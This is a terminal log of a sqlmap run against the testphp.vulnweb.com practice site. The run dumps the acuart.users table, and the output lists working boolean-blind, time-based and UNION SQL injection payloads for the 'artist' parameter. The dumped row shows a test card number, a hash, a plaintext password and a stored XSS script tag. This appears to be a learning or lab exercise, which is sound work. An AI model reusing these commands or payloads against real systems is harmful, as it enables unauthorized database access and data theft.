┌──(zitsaman11㉿MFThree)-[~]
└─$ sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --dump  >> ~/Desktop/sql_inject4.txt

        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.6.7#stable}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:28:26 /2022-11-05/

[06:28:26] [INFO] resuming back-end DBMS 'mysql' 
[06:28:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 7950=7950

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 8503 FROM (SELECT(SLEEP(5)))WCBX)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-8128 UNION ALL SELECT NULL,CONCAT(0x7162767071,0x4e7a7263706c614355704a7264786e77684747456d58796d6269774d4c576b6d48767a6546506b6c,0x716a707a71),NULL-- -
---
[06:28:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.0.12
[06:28:27] [INFO] fetching columns for table 'users' in database 'acuart'
[06:28:27] [INFO] fetching entries for table 'users' in database 'acuart'
[06:28:27] [INFO] recognized possible password hashes in column 'cart'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] do you want to crack them via a dictionary-based attack? [Y/n/q] Database: acuart
n
Table: users
[1 entry]
+---------------------+----------------------------------+----------------------------------+------+-----------------+---------+-------+-----------+
| cc                  | cart                             | name                             | pass | email           | phone   | uname | address   |
+---------------------+----------------------------------+----------------------------------+------+-----------------+---------+-------+-----------+
| 1234-5678-2300-9000 | e20b144a8180981188f61ba751e9c3f4 | <script>alert(“hacked”)</script> | test | email@email.com | 2323345 | test  | 21 street |
+---------------------+----------------------------------+----------------------------------+------+-----------------+---------+-------+-----------+

[06:29:01] [INFO] table 'acuart.users' dumped to CSV file '/home/zitsaman11/.local/share/sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[06:29:01] [INFO] fetched data logged to text files under '/home/zitsaman11/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 06:29:01 /2022-11-05/
n
